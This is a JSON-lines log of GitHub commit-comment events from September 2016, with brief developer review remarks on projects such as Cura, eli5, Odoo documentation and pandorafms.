{"id":"4594958953","type":"CommitCommentEvent","actor":{"login":"elyas-bhy"},"repo":{"name":"kevva/exec-buffer"},"payload":{"comment":{"id":19110387,"position":null,"line":null,"path":null,"commit_id":"aa7970884b04ba920740c21b7b4c3fa441d0142f","created_at":"2016-09-21T09:04:35Z","updated_at":"2016-09-21T09:04:35Z","body":"Could we please get a release for this change?"}},"created_at":"2016-09-21T09:04:35Z"}
{"id":"4594959475","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19110390,"position":null,"line":null,"path":null,"commit_id":"cc650542018a216e1af66982885877a68cd80a16","created_at":"2016-09-21T09:04:41Z","updated_at":"2016-09-21T09:04:41Z","body":"Thanks again :)\r\n\r\nI forgot to say that I have ported some more commits regarding vidc, maybe these can fix the problem regarding vidc.... I didn't test them yet, maybe you can do that.\r\n\r\nThanks"}},"created_at":"2016-09-21T09:04:41Z"}
{"id":"4594960320","type":"CommitCommentEvent","actor":{"login":"PGWelch"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19110399,"position":null,"line":null,"path":null,"commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-21T09:04:53Z","updated_at":"2016-09-21T09:04:53Z","body":"Great... I've been trying to put together a failing test for the last hour but its turned out to be trickier to test than I realised...."}},"created_at":"2016-09-21T09:04:53Z"}
{"id":"4594961013","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19110404,"position":9,"line":0,"path":"main.py","commit_id":"c82bb1f396a054e74a34234ee6dd787b8c33d054","created_at":"2016-09-21T09:05:02Z","updated_at":"2016-09-21T09:05:02Z","body":"Very nice."}},"created_at":"2016-09-21T09:05:02Z"}
{"id":"4594962606","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110408,"position":5,"line":144,"path":"src/settings/settings.cpp","commit_id":"4bea7d8ba231e15f506a9fb9a201a8eeedba6686","created_at":"2016-09-21T09:05:23Z","updated_at":"2016-09-21T09:05:23Z","body":"The check below is still necessary for if `indicated_layer_number` is 0.\r\n\r\nThis line is designed to fail early on faulty parameters."}},"created_at":"2016-09-21T09:05:23Z"}
{"id":"4594966543","type":"CommitCommentEvent","actor":{"login":"jigsawpieces"},"repo":{"name":"RaisingITDev/codeclips"},"payload":{"comment":{"id":19110413,"position":null,"line":null,"path":null,"commit_id":"7c714a889fd551581d3318207ef29ff14c4b4b60","created_at":"2016-09-21T09:05:57Z","updated_at":"2016-09-21T09:05:57Z","body":"here's an example of what I have in my .gitignore file:\r\n\r\n`*.map\r\n*/.sass-cache/\r\n/.sass-cache/`"}},"created_at":"2016-09-21T09:05:57Z"}
{"id":"4594967202","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19110415,"position":null,"line":null,"path":null,"commit_id":"c50f873653ef2e018071ee8c4cede5e7c51f8c76","created_at":"2016-09-21T09:06:06Z","updated_at":"2016-09-21T09:06:06Z","body":"[Code coverage](https://127-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-21T09:06:06Z"}
{"id":"4594967830","type":"CommitCommentEvent","actor":{"login":"DP044946"},"repo":{"name":"OpenNMS/opennms"},"payload":{"comment":{"id":19110416,"position":51,"line":57,"path":"features/events/syslog/src/main/java/org/opennms/netmgt/syslogd/SyslogDTOToObjectProcessor.java","commit_id":"fc71f46a04b5f58569ff86699cb2250280e1ecd1","created_at":"2016-09-21T09:06:13Z","updated_at":"2016-09-21T09:06:13Z","body":"I have implemented header here as well & modified blueprint file. by-default the value is set to true."}},"created_at":"2016-09-21T09:06:13Z"}
{"id":"4594969427","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/documentation-user"},"payload":{"comment":{"id":19110420,"position":4,"line":3,"path":"accounting/others/taxes/application.rst","commit_id":"90eb978cfbe1ce11d48320d12e2fd953b81bb774","created_at":"2016-09-21T09:06:33Z","updated_at":"2016-09-21T09:06:33Z","body":"@fgi-odoo Just a note for the next times. The `=`, `-` or `~` should have the same length as the (sub(-sub)-)title. \r\n"}},"created_at":"2016-09-21T09:06:33Z"}
{"id":"4594972205","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/HtmlTrack"},"payload":{"comment":{"id":19110426,"position":23,"line":23,"path":"form.html","commit_id":"bc826727de425df7cd0a13ff2938b099cf994331","created_at":"2016-09-21T09:07:10Z","updated_at":"2016-09-21T09:07:10Z","body":"I would allow using `<table>` for formatting because you are not using CSS. `<table>` should only be used for tables. CSS is always a better option. @damilola-dealdey "}},"created_at":"2016-09-21T09:07:10Z"}
{"id":"4594972807","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19110428,"position":6,"line":0,"path":"init.py","commit_id":"752a2a61593e1117fbf707d01b80cad812b160c9","created_at":"2016-09-21T09:07:17Z","updated_at":"2016-09-21T09:07:17Z","body":"Yes, very good. I only recently realized that 'file' is a built-in type. There may be more of these in the old code."}},"created_at":"2016-09-21T09:07:17Z"}
{"id":"4594972970","type":"CommitCommentEvent","actor":{"login":"wjh"},"repo":{"name":"wjh/zif"},"payload":{"comment":{"id":19110429,"position":5,"line":89,"path":"localpeer_test.go","commit_id":"976c684d00c2dc1aae6e695ea9f1ce435dad2b8d","created_at":"2016-09-21T09:07:18Z","updated_at":"2016-09-21T09:07:18Z","body":"Sometimes the initial peer will be the closest known, and it's table will have three entries. Sometimes it will not be, and it's table will have two."}},"created_at":"2016-09-21T09:07:18Z"}
{"id":"4594975503","type":"CommitCommentEvent","actor":{"login":"ngaut"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19110437,"position":5,"line":73,"path":"src/util/rocksdb.rs","commit_id":"b0eb80c694052c500b09fae053fc7cbcbb65004d","created_at":"2016-09-21T09:07:51Z","updated_at":"2016-09-21T09:07:51Z","body":"Please add comments"}},"created_at":"2016-09-21T09:07:51Z"}
{"id":"4594975958","type":"CommitCommentEvent","actor":{"login":"tdjole"},"repo":{"name":"tdjole/hello-world"},"payload":{"comment":{"id":19110441,"position":null,"line":null,"path":null,"commit_id":"dace97a98cb60291729b69f7e821b78e2bb93b6e","created_at":"2016-09-21T09:07:57Z","updated_at":"2016-09-21T09:07:57Z","body":"added some headlines"}},"created_at":"2016-09-21T09:07:57Z"}
{"id":"4594977884","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/HtmlTrack"},"payload":{"comment":{"id":19110449,"position":39,"line":39,"path":"form.html","commit_id":"bc826727de425df7cd0a13ff2938b099cf994331","created_at":"2016-09-21T09:08:21Z","updated_at":"2016-09-21T09:08:21Z","body":"This should have a placeholder."}},"created_at":"2016-09-21T09:08:21Z"}
{"id":"4594978992","type":"CommitCommentEvent","actor":{"login":"nramon"},"repo":{"name":"pandorafms/pandorafms"},"payload":{"comment":{"id":19110452,"position":null,"line":null,"path":null,"commit_id":"ec352d16e17f1e42cb8aabb5f0163951be1bfb5e","created_at":"2016-09-21T09:08:35Z","updated_at":"2016-09-21T09:08:35Z","body":"Hi Axel,\n\nThank you, you're right about that line (although there's no need to\nkeep STDIN open). I have removed it instead so that there's a single\nentry point for tests (test.sh). But we still have to fix some errors.\n\nThe integration with Sauce Labs was great... When it worked O:-) There\nwere a couple of days last week when it was very unstable, so we decided\nto run all the tests inside the docker image for now. We really need\nthem to be reliable.\n\nOn Tue, Sep 20, 2016 at 02:58:30PM -0700, Axel wrote:\n>    Shouldn't be the last line of the .travis.yml file: docker exec -it\n>    python $TRAVIS_BUILD_DIR/tests/run_console_tests.py.\n> \n>    Executing it without the docker exec section causes the script to be\n>    executed from the Travis VM.\n> \n>    —\n>    You are receiving this because you authored the thread.\n>    Reply to this email directly, [1]view it on GitHub, or [2]mute the\n>    thread.\n> \n> References\n> \n>    1. https://github.com/pandorafms/pandorafms/commit/ec352d16e17f1e42cb8aabb5f0163951be1bfb5e#commitcomment-19104862\n>    2. https://github.com/notifications/unsubscribe-auth/AIC_eDFj-fBhlYKJJ3jhWGHotGxTZllAks5qsFcGgaJpZM4KCMDr\n\n-- \nUn saludo,\n    Ramon Novoa\n    Lead Developer\n    T: +34 91 559 72 22\n    ramon.novoa@artica.es\n    www.artica.es\n"}},"created_at":"2016-09-21T09:08:35Z"}
{"id":"4594979656","type":"CommitCommentEvent","actor":{"login":"DiegoSwDev"},"repo":{"name":"DiegoSwDev/Prueba"},"payload":{"comment":{"id":19110456,"position":null,"line":null,"path":null,"commit_id":"9cafcb6a64b6ca278cb1ed0cfabb56fb0309ef9e","created_at":"2016-09-21T09:08:43Z","updated_at":"2016-09-21T09:08:43Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;10TP5aBO&#x2F;17-en-el-frontend-de-tracking-es-necesario-realizar-primero-la-busqueda-por-last-uid-y-luego-aplicar-el-resto-de-filtros-para-evita\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> En el frontend de tracking, es necesario realizar primero la búsqueda por last uid y luego aplicar el resto de filtros para evitar &quot;perder&quot; información deseada en la búsqueda</a>"}},"created_at":"2016-09-21T09:08:43Z"}
{"id":"4594979761","type":"CommitCommentEvent","actor":{"login":"audkar"},"repo":{"name":"audkar/kotlin-cli"},"payload":{"comment":{"id":19110457,"position":3,"line":0,"path":"README.md","commit_id":"c84cda9b91cd2aec47cd5d94a89157233149029d","created_at":"2016-09-21T09:08:44Z","updated_at":"2016-09-21T09:08:44Z","body":"This looks strange change"}},"created_at":"2016-09-21T09:08:44Z"}
{"id":"4594981092","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19110458,"position":5,"line":402,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"d391639b48e3e3adc3af6c935e7595490ed4025a","created_at":"2016-09-21T09:09:00Z","updated_at":"2016-09-21T09:09:00Z","body":"Yes, I did. Did you before saying it's wrong? :stuck_out_tongue_winking_eye: "}},"created_at":"2016-09-21T09:09:00Z"}
{"id":"4594981325","type":"CommitCommentEvent","actor":{"login":"xiaopaohui"},"repo":{"name":"xiaopaohui/home"},"payload":{"comment":{"id":19110460,"position":null,"line":null,"path":null,"commit_id":"a32cb48e10d5965508ddb9517a329707c1312f4c","created_at":"2016-09-21T09:09:04Z","updated_at":"2016-09-21T09:09:04Z","body":"1"}},"created_at":"2016-09-21T09:09:04Z"}
{"id":"4594984083","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":19110465,"position":null,"line":null,"path":null,"commit_id":"f4f813237c1179f0ded210b1b1e686ad09dd2cd8","created_at":"2016-09-21T09:09:39Z","updated_at":"2016-09-21T09:09:39Z","body":":heart: !"}},"created_at":"2016-09-21T09:09:39Z"}
{"id":"4594985028","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/documentation-user"},"payload":{"comment":{"id":19110467,"position":114,"line":52,"path":"accounting/others/taxes/application.rst","commit_id":"90eb978cfbe1ce11d48320d12e2fd953b81bb774","created_at":"2016-09-21T09:09:50Z","updated_at":"2016-09-21T09:09:50Z","body":"@fgi-odoo Just a note for the next times: \r\n\r\nThe syntax for `.. note::` or `.. foo::` in a general way is that you have to indent the text on the next line.\r\n\r\nExample: \r\n```\r\n.. note::\r\n    If you use Odoo Accounting, you can also map the Income/Expense accounts according to the fiscal\r\n    position. For example, in some countries, revenues from sales are not posted in\r\n    the same account than revenues from sales in foreign countries.\r\n```\r\n"}},"created_at":"2016-09-21T09:09:50Z"}
{"id":"4594988985","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/documentation-user"},"payload":{"comment":{"id":19110474,"position":114,"line":52,"path":"accounting/others/taxes/application.rst","commit_id":"90eb978cfbe1ce11d48320d12e2fd953b81bb774","created_at":"2016-09-21T09:10:40Z","updated_at":"2016-09-21T09:10:40Z","body":"We should also respect some PEP8 rules, like not more than 80 characters per lines."}},"created_at":"2016-09-21T09:10:40Z"}
{"id":"4594990578","type":"CommitCommentEvent","actor":{"login":"silvanheller"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19110478,"position":24,"line":37,"path":"src/org/vitrivr/cineast/core/util/MaxPool.java","commit_id":"bba152c956b84052add71dc1d36eea81ffee5cff","created_at":"2016-09-21T09:11:00Z","updated_at":"2016-09-21T09:11:00Z","body":"62ede547db9f7ab9e9ff2aa83aff1f1e72e5b583"}},"created_at":"2016-09-21T09:11:00Z"}
{"id":"4594991669","type":"CommitCommentEvent","actor":{"login":"lopuhin"},"repo":{"name":"TeamHG-Memex/eli5"},"payload":{"comment":{"id":19110479,"position":25,"line":38,"path":"eli5/sklearn/utils.py","commit_id":"0d992354045ace012f66aa2b0e0647cb17314a86","created_at":"2016-09-21T09:11:13Z","updated_at":"2016-09-21T09:11:13Z","body":"Maybe it's more convenient for the user to assume that bias is not included in `feature_names`? I think that features are usually fixed, and whether we include bias or not is a property of the classifier."}},"created_at":"2016-09-21T09:11:13Z"}
{"id":"4594994788","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110482,"position":30,"line":49,"path":"src/raft.cpp","commit_id":"ceff626d8774a0449a99000674fe3609d7199e9a","created_at":"2016-09-21T09:11:52Z","updated_at":"2016-09-21T09:11:52Z","body":"So if you have an air gap of 0.25mm, and a layer height of 0.1mm (so it's not divisible), what should filler_layer_count be? If it's 2, you'll still have a gap, and if it's 3, you'll be overextruding."}},"created_at":"2016-09-21T09:11:52Z"}
{"id":"4594997837","type":"CommitCommentEvent","actor":{"login":"leon-liu"},"repo":{"name":"leon-liu/Hello-world"},"payload":{"comment":{"id":19110485,"position":null,"line":null,"path":null,"commit_id":"661e3a8fc41d07a52dcfdb3291a1f358fd67202b","created_at":"2016-09-21T09:12:29Z","updated_at":"2016-09-21T09:12:29Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;W9qm57X0&#x2F;1-add-new-task\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add new task</a>"}},"created_at":"2016-09-21T09:12:29Z"}
{"id":"4595000912","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19110503,"position":null,"line":null,"path":null,"commit_id":"57d072da1335c4475b43cba5b978ec629e65cadd","created_at":"2016-09-21T09:13:06Z","updated_at":"2016-09-21T09:13:06Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ASsTKfeoSHmKbCvMyhqVvw"}},"created_at":"2016-09-21T09:13:06Z"}
{"id":"4595003265","type":"CommitCommentEvent","actor":{"login":"kattrali"},"repo":{"name":"bugsnag/bugsnag-php"},"payload":{"comment":{"id":19110515,"position":12,"line":12,"path":"example/php-expanded/index.php","commit_id":"78197f6c2566f406d94b3823f750d6e50998c5e3","created_at":"2016-09-21T09:13:34Z","updated_at":"2016-09-21T09:13:34Z","body":"Thanks, Graham. Given [this](https://docs.bugsnag.com/platforms/php/other/#basic-configuration), how exactly would you reference this instance from within a function?"}},"created_at":"2016-09-21T09:13:34Z"}
{"id":"4595004174","type":"CommitCommentEvent","actor":{"login":"zszsrex"},"repo":{"name":"zszsrex/hello-world"},"payload":{"comment":{"id":19110519,"position":1,"line":1,"path":"README.md","commit_id":"c1bb44419e9b5448d4f3a8c49b80dfa9748b9d3d","created_at":"2016-09-21T09:13:44Z","updated_at":"2016-09-21T09:13:44Z","body":"你好世界"}},"created_at":"2016-09-21T09:13:44Z"}
{"id":"4595004517","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19110521,"position":null,"line":null,"path":null,"commit_id":"0522e8da0438f1be80fb4a50cc05d626c6b8b9bb","created_at":"2016-09-21T09:13:49Z","updated_at":"2016-09-21T09:13:49Z","body":"Sorry, I did`t explain clearly.\r\n\r\nThere are three issues.\r\n\r\nOne is video recording: aac hw encoding not work.\r\n\r\nOne is vidc drivers: maybe LG stock rom media HAL too old.\r\n\r\nOne is kernel panic when phone restart."}},"created_at":"2016-09-21T09:13:49Z"}
{"id":"4595006628","type":"CommitCommentEvent","actor":{"login":"magol"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":19110530,"position":null,"line":null,"path":null,"commit_id":"c5f2806092b480988f80500d615de176e9d402b0","created_at":"2016-09-21T09:14:14Z","updated_at":"2016-09-21T09:14:14Z","body":"Should not this be tagged as v1.1.0 instead of prev commit?"}},"created_at":"2016-09-21T09:14:14Z"}
{"id":"4595008778","type":"CommitCommentEvent","actor":{"login":"kmike"},"repo":{"name":"TeamHG-Memex/eli5"},"payload":{"comment":{"id":19110534,"position":25,"line":38,"path":"eli5/sklearn/utils.py","commit_id":"0d992354045ace012f66aa2b0e0647cb17314a86","created_at":"2016-09-21T09:14:40Z","updated_at":"2016-09-21T09:14:40Z","body":"Bias is just a feature which is equal to 1 for all input examples, and which is usually not regularized; scikit-learn handles it separately for efficiency. What do you think about suggesting \"Have you appended bias feature name to feature_names?\" in error message instead?"}},"created_at":"2016-09-21T09:14:40Z"}
{"id":"4595009461","type":"CommitCommentEvent","actor":{"login":"gaoshan12312"},"repo":{"name":"gaoshan12312/GitStu1"},"payload":{"comment":{"id":19110537,"position":null,"line":null,"path":null,"commit_id":"8e7480ca7337770ee30d19d23f4b39e7ff5916b7","created_at":"2016-09-21T09:14:48Z","updated_at":"2016-09-21T09:14:48Z","body":"你改的不行"}},"created_at":"2016-09-21T09:14:48Z"}
{"id":"4595009968","type":"CommitCommentEvent","actor":{"login":"DiegoSwDev"},"repo":{"name":"DiegoSwDev/Prueba"},"payload":{"comment":{"id":19110538,"position":null,"line":null,"path":null,"commit_id":"4852334a658f1588875d4ec2b3fd6cb132ffb6c0","created_at":"2016-09-21T09:14:54Z","updated_at":"2016-09-21T09:14:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DlSkMJMB&#x2F;117-revisar-sustitucion-de-centralitas-tanto-xx05-como-xx06-con-el-maximo-numero-de-nodos-32-nodos\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Revisar sustitución de centralitas tanto xx05 como xx06 con el máximo número de nodos (32 nodos)</a>"}},"created_at":"2016-09-21T09:14:54Z"}
{"id":"4595010891","type":"CommitCommentEvent","actor":{"login":"nramon"},"repo":{"name":"pandorafms/pandorafms"},"payload":{"comment":{"id":19110539,"position":null,"line":null,"path":null,"commit_id":"ec352d16e17f1e42cb8aabb5f0163951be1bfb5e","created_at":"2016-09-21T09:15:06Z","updated_at":"2016-09-21T09:15:06Z","body":"Hi Axel:\n\nThank you for the tips. I've already moved the display code to\nrun_console_tests.py, but upgrading to python 2.7 inside the CentOS 6\nimage can be a PITA. Let's hope we don't have to resort to that :-)\n\nOn Tue, Sep 20, 2016 at 03:30:23PM -0700, Axel wrote:\n>    See the [1]build of my forked repo. It somehow failed, but it\n>    definitively executed the tests inside the container.\n> \n>    I throw two clues:\n>     1. Maybe it's something related to the display being creating with\n>        every test object? Maybe it'd be better in run_console_tests.py.\n>     2. Remember that we used python 2.7 (rather than the 2.6 that CentOS\n>        brings by default). Maybe it'd help to install it.\n> \n>    —\n>    You are receiving this because you authored the thread.\n>    Reply to this email directly, [2]view it on GitHub, or [3]mute the\n>    thread.\n> \n> References\n> \n>    1. https://travis-ci.org/axl89/pandorafms/builds/161473960\n>    2. https://github.com/pandorafms/pandorafms/commit/ec352d16e17f1e42cb8aabb5f0163951be1bfb5e#commitcomment-19105247\n>    3. https://github.com/notifications/unsubscribe-auth/AIC_eKhWdIisP6A552afofxUIuEIH0l2ks5qsF5_gaJpZM4KCMDr\n\n-- \nUn saludo,\n    Ramon Novoa\n    Lead Developer\n    T: +34 91 559 72 22\n    ramon.novoa@artica.es\n    www.artica.es\n"}},"created_at":"2016-09-21T09:15:06Z"}
{"id":"4595011966","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/HtmlTrack"},"payload":{"comment":{"id":19110543,"position":75,"line":75,"path":"form.html","commit_id":"bc826727de425df7cd0a13ff2938b099cf994331","created_at":"2016-09-21T09:15:19Z","updated_at":"2016-09-21T09:15:19Z","body":"`pizza-radio` or `pizza_radio` instead of `pizzaRadio`"}},"created_at":"2016-09-21T09:15:19Z"}
{"id":"4595013056","type":"CommitCommentEvent","actor":{"login":"LookItsCarl"},"repo":{"name":"LookItsCarl/BlackJack"},"payload":{"comment":{"id":19110546,"position":null,"line":null,"path":null,"commit_id":"9991b3cfc7dbc13e667cca8d9b6361af9a45686e","created_at":"2016-09-21T09:15:32Z","updated_at":"2016-09-21T09:15:32Z","body":"Having problems with the betting system. It bets more cash than available in wallet. "}},"created_at":"2016-09-21T09:15:32Z"}
{"id":"4595018566","type":"CommitCommentEvent","actor":{"login":"kmike"},"repo":{"name":"TeamHG-Memex/eli5"},"payload":{"comment":{"id":19110563,"position":25,"line":38,"path":"eli5/sklearn/utils.py","commit_id":"0d992354045ace012f66aa2b0e0647cb17314a86","created_at":"2016-09-21T09:16:38Z","updated_at":"2016-09-21T09:16:38Z","body":"I went back and forth on adding `<BIAS>` to feature names automatically if feature_names length is the same as `coef_` size, but decided against it in spirit of pep20 :)"}},"created_at":"2016-09-21T09:16:38Z"}
{"id":"4595020189","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19110567,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T09:16:56Z","updated_at":"2016-09-21T09:16:56Z","body":"Adding our (jflte) bootloader to /device/samsung/jflte/releasetools/loki_bootloaders will force loki to recognize our device as locked bootloader.doing that we will figure out if loki is triggered or not....am i wrong :) ?"}},"created_at":"2016-09-21T09:16:56Z"}
{"id":"4595020294","type":"CommitCommentEvent","actor":{"login":"MatrixYuri"},"repo":{"name":"portl4t/ts-lua"},"payload":{"comment":{"id":19110568,"position":55,"line":349,"path":"src/ts_lua_fetch.c","commit_id":"3830a0a5602cb350ba81c465fc7461ce648f3e79","created_at":"2016-09-21T09:16:57Z","updated_at":"2016-09-21T09:16:57Z","body":"呃...这里是不是应该 (ht == 1) 才对？\r\n332 行设置了 ht = 1; 默认值为0，所以这里是不是判断反了？"}},"created_at":"2016-09-21T09:16:57Z"}
{"id":"4595020541","type":"CommitCommentEvent","actor":{"login":"tomas-stefano"},"repo":{"name":"moneyadviceservice/rad"},"payload":{"comment":{"id":19110569,"position":null,"line":null,"path":null,"commit_id":"1afd1efeacc549ffdc9852262260c0f28d9c21f2","created_at":"2016-09-21T09:17:00Z","updated_at":"2016-09-21T09:17:00Z","body":"👍 "}},"created_at":"2016-09-21T09:17:00Z"}
{"id":"4595026539","type":"CommitCommentEvent","actor":{"login":"kmike"},"repo":{"name":"TeamHG-Memex/eli5"},"payload":{"comment":{"id":19110576,"position":25,"line":38,"path":"eli5/sklearn/utils.py","commit_id":"0d992354045ace012f66aa2b0e0647cb17314a86","created_at":"2016-09-21T09:18:11Z","updated_at":"2016-09-21T09:18:11Z","body":"maybe auto-adding `<BIAS>` in this case is not bad though"}},"created_at":"2016-09-21T09:18:11Z"}
{"id":"4595027932","type":"CommitCommentEvent","actor":{"login":"veloai"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19110582,"position":15,"line":15,"path":"10-operator(5).html","commit_id":"8a5678da0797995dfdd88ff8b385244ad1d856c1","created_at":"2016-09-21T09:18:27Z","updated_at":"2016-09-21T09:18:27Z","body":"asdftesttestetasetasdfj\r\ncontent document"}},"created_at":"2016-09-21T09:18:27Z"}
{"id":"4595031195","type":"CommitCommentEvent","actor":{"login":"veloai"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19110590,"position":13,"line":13,"path":"10-operator(5).html","commit_id":"8a5678da0797995dfdd88ff8b385244ad1d856c1","created_at":"2016-09-21T09:19:08Z","updated_at":"2016-09-21T09:19:08Z","body":"??? asdfcomment?\r\n\r\n> \r\n\r\n> \r\n\r\n> **sa[wefg](url)**"}},"created_at":"2016-09-21T09:19:08Z"}
{"id":"4595031918","type":"CommitCommentEvent","actor":{"login":"lopuhin"},"repo":{"name":"TeamHG-Memex/eli5"},"payload":{"comment":{"id":19110592,"position":25,"line":38,"path":"eli5/sklearn/utils.py","commit_id":"0d992354045ace012f66aa2b0e0647cb17314a86","created_at":"2016-09-21T09:19:17Z","updated_at":"2016-09-21T09:19:17Z","body":"Yep, having it automatically added depending on the length feels hacky :)\r\nI was mostly thinking that currently if I want to supply feature names, I'll have to do: `feature_names=data.features + ['<BIAS>'] if clf.fit_intersept else []`"}},"created_at":"2016-09-21T09:19:17Z"}
{"id":"4595032797","type":"CommitCommentEvent","actor":{"login":"veloai"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19110596,"position":null,"line":null,"path":null,"commit_id":"8a5678da0797995dfdd88ff8b385244ad1d856c1","created_at":"2016-09-21T09:19:28Z","updated_at":"2016-09-21T09:19:28Z","body":"test asdf"}},"created_at":"2016-09-21T09:19:28Z"}
{"id":"4595033764","type":"CommitCommentEvent","actor":{"login":"MatrixYuri"},"repo":{"name":"portl4t/ts-lua"},"payload":{"comment":{"id":19110597,"position":55,"line":349,"path":"src/ts_lua_fetch.c","commit_id":"3830a0a5602cb350ba81c465fc7461ce648f3e79","created_at":"2016-09-21T09:19:39Z","updated_at":"2016-09-21T09:19:39Z","body":"呃，sorry，这里是我看错了，这个if的内容是解析原有的url，取出host放入header中。\r\n如果之前已经设置过host，这里会忽略~\r\n\r\nSorry~~"}},"created_at":"2016-09-21T09:19:39Z"}
{"id":"4595036182","type":"CommitCommentEvent","actor":{"login":"aiceru"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19110602,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T09:20:09Z","updated_at":"2016-09-21T09:20:09Z","body":"```java\r\nMemcachedNode colln = ketamaNodes.put(k, node);\r\nif (colln != null) {\r\n    if (config.compareNodeName(node, colln) < 0) {\r\n      ketamaNodes.put(k, colln);\r\n    }\r\n}\r\n```\r\n으로 수정하는 것이 어떨까요? 아까 오전에 코드 보면서 구상했던 방식인데, Collision 이 발생할 확률이 매우매우매우 낮기 때문에 거의 대부분의 경우 `colln == null` 이 되어 첫번째 if 문에서 걸러지므로 매번 treemap 에서 get 하여 검사하는 방식보다 조금이나마 효율이 좋을 거라 생각합니다."}},"created_at":"2016-09-21T09:20:09Z"}
{"id":"4595037485","type":"CommitCommentEvent","actor":{"login":"SuZhuo20"},"repo":{"name":"SuZhuo20/git_javascription_jilei"},"payload":{"comment":{"id":19110603,"position":18,"line":18,"path":"absolute.html","commit_id":"74a8a9a4c8297fe69a2b23fb074d4c2bfa34c79d","created_at":"2016-09-21T09:20:22Z","updated_at":"2016-09-21T09:20:22Z","body":"最外层父元素\r\n"}},"created_at":"2016-09-21T09:20:22Z"}
{"id":"4595037914","type":"CommitCommentEvent","actor":{"login":"rjfd"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":19110604,"position":28,"line":306,"path":"xml/admin_ceph_iscsi.xml","commit_id":"b9658aca168a5aac74dbb214c46015452ea40b38","created_at":"2016-09-21T09:20:28Z","updated_at":"2016-09-21T09:20:28Z","body":"typo: not `-image-format 1` but `--image-format 1`"}},"created_at":"2016-09-21T09:20:28Z"}
{"id":"4595038242","type":"CommitCommentEvent","actor":{"login":"kmike"},"repo":{"name":"TeamHG-Memex/eli5"},"payload":{"comment":{"id":19110606,"position":25,"line":38,"path":"eli5/sklearn/utils.py","commit_id":"0d992354045ace012f66aa2b0e0647cb17314a86","created_at":"2016-09-21T09:20:32Z","updated_at":"2016-09-21T09:20:32Z","body":"yes, or wrap it to scikit-learn interface and implement get_feature_names"}},"created_at":"2016-09-21T09:20:32Z"}
{"id":"4595038570","type":"CommitCommentEvent","actor":{"login":"HarryAi"},"repo":{"name":"HarryAi/HelloWorld"},"payload":{"comment":{"id":19110607,"position":null,"line":null,"path":null,"commit_id":"ebe7ab4b24cbe14a20c8375a9d41b0b7498d4063","created_at":"2016-09-21T09:20:37Z","updated_at":"2016-09-21T09:20:37Z","body":"a"}},"created_at":"2016-09-21T09:20:37Z"}
{"id":"4595039286","type":"CommitCommentEvent","actor":{"login":"HarryAi"},"repo":{"name":"HarryAi/HelloWorld"},"payload":{"comment":{"id":19110609,"position":null,"line":null,"path":null,"commit_id":"ebe7ab4b24cbe14a20c8375a9d41b0b7498d4063","created_at":"2016-09-21T09:20:46Z","updated_at":"2016-09-21T09:20:46Z","body":"啊"}},"created_at":"2016-09-21T09:20:46Z"}
